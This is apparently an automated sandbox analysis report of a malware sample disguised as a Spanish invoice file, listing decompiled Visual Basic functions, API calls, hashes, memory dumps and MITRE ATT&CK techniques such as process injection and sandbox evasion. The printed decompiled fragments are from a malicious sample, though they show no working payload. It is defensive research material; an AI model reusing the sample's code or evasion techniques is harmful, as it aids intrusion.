				_t34 =  *((intOrPtr*)( *_v64 + 0x170))(_v64, _t31,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x310))( *_v80));
				asm("fclex");
				_v68 = _t34;
				if(_v68 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b49c);
					_push(_v64);
					_push(_v68);
					L004012EC();
					_v84 = _t34;
				}
				L004012DA();
				_push(E0040E90B);
				L00401352();
				return _t34;
			}

0x0040e81d
0x0040e820
0x0040e82b
0x0040e82c
0x0040e833
0x0040e836
0x0040e83e
0x0040e841
0x0040e84e
0x0040e856
0x0040e860
0x0040e87a
0x0040e862
0x0040e862
0x0040e867
0x0040e86c
0x0040e871
0x0040e871
0x0040e895
0x0040e899
0x0040e89e
0x0040e8a9
0x0040e8af
0x0040e8b1
0x0040e8b8
0x0040e8d4
0x0040e8ba
0x0040e8ba
0x0040e8bf
0x0040e8c4
0x0040e8c7
0x0040e8ca
0x0040e8cf
0x0040e8cf
0x0040e8db
0x0040e8e0
0x0040e905
0x0040e90a

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E836
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E84E
__vbaNew2.MSVBVM60(0040A880,00410010,?,?,?,?,004011F6), ref: 0040E86C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E899
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000170), ref: 0040E8CA
__vbaFreeVar.MSVBVM60(0040E90B), ref: 0040E905

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 6df26943f6f398e5fc49242572690509d9e3e2583aab0f0d76a93cd71ef52b71
Instruction ID: e4d0b75ef1c4f834a652a1c498d1f438378fc74e5233cdc4c12d564ba575d967
Opcode Fuzzy Hash: 6df26943f6f398e5fc49242572690509d9e3e2583aab0f0d76a93cd71ef52b71
Instruction Fuzzy Hash: FA211671900208EFCB14EFE2C845BDDBBB4BB08704F10847AF401BB2A1CBB85855CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3B4, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040E3B4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v36;
				intOrPtr _v44;
				char _v52;
				short _t13;
				intOrPtr _t24;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(0x34);
				L004011F0();
				_v12 = _t24;
				_v8 = 0x401170;
				L00401322();
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t13 =  &_v52;
				_push(_t13);
				L004012B6();
				_v36 = _t13;
				L00401352();
				_push(E0040E428);
				L00401364();
				return _t13;
			}

0x0040e3b9
0x0040e3c4
0x0040e3c5
0x0040e3cc
0x0040e3cf
0x0040e3d7
0x0040e3da
0x0040e3e7
0x0040e3ec
0x0040e3f3
0x0040e3fa
0x0040e3fd
0x0040e3fe
0x0040e403
0x0040e40a
0x0040e40f
0x0040e422
0x0040e427

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E3CF
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E3E7
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E3FE
__vbaFreeVar.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E40A

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#648ChkstkCopyFree
String ID:
API String ID: 1619509159-0
Opcode ID: 07653b265f7aba94afbe81129d9e20bb85071f825d5d3b6dc20e1811b09dc320
Instruction ID: 1d7b7b696765d8c9b9c07d37b355fa3540dcd01b0e731ea55a51655a55abc088
Opcode Fuzzy Hash: 07653b265f7aba94afbe81129d9e20bb85071f825d5d3b6dc20e1811b09dc320
Instruction Fuzzy Hash: 05F04F70810208ABDB04EB91CD42F9EB778FF08B44F50012EF601771A1D77C2904C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040C116, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C116(void* __eax) {
				void* _t12;

				L0040135E();
				_push( *((intOrPtr*)(_t12 - 0x14)));
				_push(L"Lindormen");
				L004012F8();
				L0040135E();
				_push( *((intOrPtr*)(_t12 - 0x14)));
				_push(L"Lindormen");
				L004012F8();
				L0040135E();
				_push(E0040C157);
				L00401364();
				return __eax;
			}

0x0040c116
0x0040c11b
0x0040c11e
0x0040c123
0x0040c12d
0x0040c132
0x0040c135
0x0040c13a
0x0040c144
0x0040c149
0x0040c151
0x0040c156

APIs

#616.MSVBVM60(Lindormen,?), ref: 0040C123
#616.MSVBVM60(Lindormen,?,Lindormen,?), ref: 0040C13A

Strings

Lindormen, xrefs: 0040C11E, 0040C135

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #616
String ID: Lindormen
API String ID: 3133330629-1899767452
Opcode ID: 28f554aefc496f4b5a973840bfe1d11401d103fdd888a89bf88de1de43062533
Instruction ID: c7f5e1f30d94aa29e811f5420a882b6430b5b8d56d3066df35d0957d8d05eea0
Opcode Fuzzy Hash: 28f554aefc496f4b5a973840bfe1d11401d103fdd888a89bf88de1de43062533
Instruction Fuzzy Hash: C5D0EC32E0020996DB05B7E5DA429EEB322AA40704B60413FB512724F3DE3D0A02975D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 7052 Parent PID: 7104 RegAsm.exeCOMMON

Executed Functions

Non-executed Functions

Function 00B01338, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

`, xrefs: 00B013AC

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 1191ec0320f4bf537530255cc308cb6c86a2a93ee4543b697fbdbd82c8baad0a
Instruction ID: 067dae62982adb85ff7be96a2dac75d5097d57c02134c31308d7e4e57b3f2dbc
Opcode Fuzzy Hash: 1191ec0320f4bf537530255cc308cb6c86a2a93ee4543b697fbdbd82c8baad0a
Instruction Fuzzy Hash: 45B1A3B1700606AFE758DF28CD80BE5BBE4FF48314F158668E95997381DB74AC548BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B05046, Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

1n, xrefs: 00B05445

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID: 1n
API String ID: 0-425914684
Opcode ID: c4a67559930153960dcf1594b16e15bffbea81d6291719f0c7cb4011e3d48ee3
Instruction ID: ea4c2529ce0326b2562362e59511a7ee191b51eba68fda43c21db52d1c44444f
Opcode Fuzzy Hash: c4a67559930153960dcf1594b16e15bffbea81d6291719f0c7cb4011e3d48ee3
Instruction Fuzzy Hash: 8C81E834A047818EDB30DF2884D475ABFD1EF56360F54C2D9D9E68B6DAD3708482CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00B01959, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd054ffacc023494b31b33b86a0fc28e790c346cb8d55195477a293bd8abff63
Instruction ID: d31623540e3dedd556683fe30bfbbf74f269e8435045bd3413d66916cd2e0be8
Opcode Fuzzy Hash: bd054ffacc023494b31b33b86a0fc28e790c346cb8d55195477a293bd8abff63
Instruction Fuzzy Hash: A34129B02403009FE7256F64CD89BA97FD4FF25361F2081E5FA459B1D2D7B4CC888A52

Uniqueness

Uniqueness Score: -1.00%

Function 00B017E4, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76983f427368b0b8aaf80b171e018b07df0140685d8a3692b3b36a1ac1671c75
Instruction ID: fdef69b10acf0036a59cea9596326f26852f7b5c716176a5c7f04d6fc71b84fa
Opcode Fuzzy Hash: 76983f427368b0b8aaf80b171e018b07df0140685d8a3692b3b36a1ac1671c75
Instruction Fuzzy Hash: BA310471240105AFE3699E2CDC99BD6BBE8FF45320F1982A4F4A9D72D2DB54AC458B20

Uniqueness

Uniqueness Score: -1.00%

Function 00B0195C, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6842694456d83ffd2376647235a0c53505528eef9e5109a52d1c90b70349becf
Instruction ID: f6f861f64cb1f8ec4a4bc98cb9d13c4b930076b68845605a41986f1a2cb03a53
Opcode Fuzzy Hash: 6842694456d83ffd2376647235a0c53505528eef9e5109a52d1c90b70349becf
Instruction Fuzzy Hash: 2321F3342403409FE7369F28CC89F95BBE5EF55720F2582D8F91A5B2E2C7B0A844CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00B017C7, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6190e688fb2a2e7c8e894d61564ae462123c1b1e6dd928f7665a1b0139da4e
Instruction ID: fe47e71e2a4b740cc1b944cfa7144d58ec80ec238f8f79537d6ef1ec8a9e0336
Opcode Fuzzy Hash: 7a6190e688fb2a2e7c8e894d61564ae462123c1b1e6dd928f7665a1b0139da4e
Instruction Fuzzy Hash: 8921F271740206AFD7689B2CCC55BE57AE8FF04320F258674F8A8E32D1DA60ED489B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B02AAE, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d1a0a7557d4185e1510946cd719e74802f5bf672ef37066946c10e4ca3603a
Instruction ID: 41dd84638cfc19909391fec5e1b93c399426cdcab7defa5fe45cdcda771c759f
Opcode Fuzzy Hash: 41d1a0a7557d4185e1510946cd719e74802f5bf672ef37066946c10e4ca3603a
Instruction Fuzzy Hash: 17018F741003005FEB159F18C9C9BEA3B98EF2A3A4F2182E4ED52972E6D7B5D8898525

Uniqueness

Uniqueness Score: -1.00%

Function 00B0259E, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 00B0440E, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.916787079.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report FACTURA Y ALBARANES.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

Compliance:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: FACTURA Y ALBARANES.exe PID: 7104 Parent PID: 5936

General

Chronological Activities

Analysis Process: RegAsm.exe PID: 7052 Parent PID: 7104

General

Chronological Activities

Analysis Process: conhost.exe PID: 1324 Parent PID: 7052

General

Chronological Activities

Function 0040C16A, Relevance: 283.8, APIs: 151, Strings: 10, Instructions: 2033
COMMON

Function 00401394, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
COMMON

Function 0040BC24, Relevance: 57.3, APIs: 38, Instructions: 326
COMMON

Function 0040E675, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 110
COMMON

Function 0040E5AA, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52
COMMON

Function 0040AEC3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
COMMON

Function 0040E449, Relevance: 13.6, APIs: 9, Instructions: 78
COMMON

Function 0040EA2F, Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Function 0040E928, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Function 0040E81A, Relevance: 9.1, APIs: 6, Instructions: 63
COMMON

Function 0040E3B4, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Function 0040C116, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON